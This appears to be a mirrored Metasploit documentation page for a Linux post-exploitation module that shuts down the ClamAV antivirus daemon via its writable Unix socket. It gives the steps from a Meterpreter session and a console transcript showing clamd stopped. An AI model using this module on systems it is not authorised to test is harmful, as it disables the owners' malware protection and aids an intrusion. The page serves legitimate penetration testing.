Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/post/linux/manage/disable_clamav.md
19721 views

Description

This module will cause the ClamAV service to be shutoff on Linux hosts. ClamAV uses a Unix socket that allows non-privileged users to interact with the ClamAV daemon via utilities like "clamscan". However, no additional checks are required to trigger ClamAV's shutdown.

Verification Steps

Shutting off ClamAV

  1. Launch msfconsole

  2. Get a Meterpreter shell on a Linux host that's also running ClamAV.

  3. Do: use post/linux/manage/disable_clamav

  4. Do: set SESSION <session number on the Linux host>

  5. Do: exploit -j

  6. The daemon should be shutoff.

Scenarios

msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   SESSION             4                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

clamav    132021       1 16 18:51 ?        00:00:09 clamd
dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
msf6 post(linux/manage/disable_clamav) > exploit -j
[*] Post module running as background job 10.
msf6 post(linux/manage/disable_clamav) >
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[*] Shutting down ClamAV!

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd